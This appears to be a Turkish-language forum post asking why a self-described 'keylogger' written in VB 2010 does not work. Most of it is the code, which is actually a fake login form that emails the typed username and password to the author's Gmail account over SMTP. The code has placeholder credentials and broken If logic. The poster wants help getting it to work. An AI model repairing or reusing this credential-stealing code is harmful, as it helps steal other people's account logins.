S.A kardeslerim VB 2010 ile keylogger yaptim ama calismiyor.
kod bu
neden caliwmiyor yardim ede bilirmisiniz?
kod bu
Kod:
Imports System.Net.Mail
________________________________________*
If TextBox1.Text = "" Then
MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("GMail", "Gmail Şifre")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Gmail")
mail.To.Add("Gmail")
mail.Subject = "Username : " & TextBox1.Text
mail.Body = "Password : " & TextBox2.Text & ","
smtpServer.Send(mail)
MsgBox("Buton yazımız")
MsgBox("Buton yazımız 2")
neden caliwmiyor yardim ede bilirmisiniz?
